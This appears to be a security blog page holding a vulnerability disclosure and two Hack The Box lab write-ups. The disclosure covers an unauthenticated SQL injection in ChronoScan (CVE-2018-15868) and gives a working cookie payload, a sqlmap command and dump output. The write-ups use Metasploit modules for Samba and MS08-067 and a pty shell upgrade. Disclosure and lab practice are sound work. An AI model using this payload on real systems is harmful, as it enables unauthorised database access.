RedSec

Another Information Security Blog

Background

ChronoScan is an OCR software created by ChronoScan Capture S.L. used to read and parse of data from documents it receives. The software will take a document/pdf and based on how you have it setup, parse selected data from the input file. This is especially helpful in situations where there is an automated process sending a high number of documents that need to be put into a database or some other type of storage quickly. They have a community and enterprise versions.

Vulnerability

I've identified an unauthenticated time-based SQL injection on the latest ChronoScan enterprise version (v1.5.4.3 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions but, due to the nature of the attack (unauthenticated, no specific parameters, etc), I believe it's present on all versions up to this point. I will update this post when the vendor has confirmed to which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used with identifying users and the sessions associated with them. In this case, it seems as though the wcr_machineid cookie is inserted unsanitized into a SQL statement to check the current “machines” access level. An unauthenticated attacker can (even without a valid wcr_machineid cookie) exploit a time-based SQL injection. Below is the request that was originally used for identification.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

If you compare this request (a delay of 20 seconds) to one without the SQL statement, you will see it takes ~20 seconds for the response to come back. I took this and ran the following command in sqlmap which led to confirmation of a vulnerability.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"

After confirmation, I dumped the following databases.

[*] CHRONOSCAN
[*] master
[*] model
[*] msdb
[*] tempdb

Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache
(snip)

Timeline

-August 24, 2018: Vulnerability Identified -August 24, 2018: Vendor Notified & Acknowledged -August 24, 2018: CVE ID requested -August 24, 2018: CVE-2018-15868 reserved -August 27, 2018: Details provided to MITRE -August 28, 2018: Vendor issues patch for verification (not public yet)

The “Lame” box was categorized as a easy-intermediate box, so I decided that it would be next on my list.

I found it to be fairly easy, giving it a 2 out of 10 for difficulty.

 

Intelligence Gathering

Data Given: IP: 10.10.10.3 OS: Linux

I first pinged the host and confirmed that it was up. I then ran the following nmap scan for a general sweep of what ports were open. I do these types of scans to find any low hanging fruit that may be there. nmap -sS -sC -sV -T4 10.10.10.3 Imgur

Okay, so we have a few things that look interesting. The out of date vsftp & samba are probably how we want to get in. I looked around online for the samba version as I think I had heard of a large exploit for that recently. Luckily, rapid7 had a module at the top of my search.

The version that it was reporting was “3.0.20” which correlates with the version that rapid7 reported for the “username map script” RCE. Imgur

 

Exploitation

This module does not support checking so we are going to have to trust that nmap was not lying to us. Imgur

 

Post Exploitation

It wasn't! Unfortunately, this dropped us into a limited shell. Pentest monkey (http://pentestmonkey.net/blog/post-exploitation-without-a-tty) has a great way to gain a full TTY shell. Since I am comfortable with python, I used the whereis python command to see if it was installed. Imgur

Now that I know it is installed (and I can use it) I run the following command to gain a full TTY shell. python -c ‘import pty; pty.spawn(“/bin/sh”)’ Imgur

We are already root so lets grab the flags and move on to the next one.

 

Conclusion

I did have a trip up when I was initially trying to hack this box. I went for the vsftpd daemon first, but for some reason couldn't get a shell back. I'm going to attribute the name “lame” for that very reason. I liked this one, but I think in the future I am going to stop relying on metasploit so much and try and learn to use python/ruby scripts to send the exploits.

After taking a break from writing blogs about hacking, I thought I'd jump back into it. This write up is going to be covering the “Legacy” box from Hack The Box. If you haven't seen or heard about Hack The Box, I highly recommend you try it out.

I chose Legacy as it is a retired box, so that means you can do a write up about it. I will be trying to hack all of the retired boxes and writing about my experiences.  

Intelligence Gathering

Data given: IP: 10.10.10.4 OS: Windows

I first pinged the remote host to confirm it was online. I then ran an nmap scan with the parameters below. nmap 10.10.10.4 Imgur

Knowing that port 139 and 445 were open, I ran a more targeted scan to enumerate more about those services. nmap -sC -sV -A -p139,445,3389 10.10.10.4 Imgur This is a much more interesting scan result. It looks to be a Windows XP or 2000 box. I assume the name of the box “Legacy” refers to the version.

 

Vulnerability Analysis

I did a quick search with searchsploit for “Windows 2000” and noticed this result. Imgur

 

Exploitation

I fired up metasploit and loaded the module for MS08-067. Imgur

I set the target to the remote host and to verify that it was actually vulnerable, I used the “check” command in metasploit. Imgur

Sweet! Let's exploit now! Imgur Awesome, it worked!

 

Post Exploitation

Next goal is to get the flags for both the user and root (Administrator in this case). Both flags on are on each user's desktop. To do this, I'll drop into a shell session on the host. I need to see if I can get the flags without having to do any sort of privesc. Imgur I was able to grab the user flag without having to do any sort of privesc. Now, let's try the same thing for the Administrator account. Imgur Alright! That wasn't bad at all. On to the next one!

 

Conclusion

This was a very easy lab that had us use MS08-067 on a Windows XP computer. I didn't use any outside resources on this one, besides searchsploit, which can be found here. Looking forward to the next one!